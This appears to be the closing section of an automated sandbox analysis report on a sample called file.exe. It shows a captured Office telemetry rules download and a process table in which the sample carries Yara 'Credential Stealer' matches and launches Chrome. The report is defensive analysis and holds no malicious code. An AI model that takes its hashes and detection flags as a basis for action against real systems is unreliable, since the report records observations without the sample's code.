                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          149192.168.2.54995413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:30 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:30 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1414
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                          ETag: "0x8DC582BE03B051D"
                                                                                                                                                                          x-ms-request-id: f390f01b-d01e-0017-588c-3ab035000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180230Z-174c587ffdftjz9shC1TEBsh98000000035g000000007zcv
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:30 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:13:01:02
                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                          File size:1'861'632 bytes
                                                                                                                                                                          MD5 hash:4B54E831BD5F7784815A385AA6E7D42B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2117012787.0000000001629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2213209784.0000000001622000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2213156160.000000000161B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:13:01:46
                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:13:01:46
                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1984,i,11204049690359226366,8167700250922482004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:13:01:51
                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:13:01:51
                                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1984,i,13680411521332787545,10737033242991967105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          No disassembly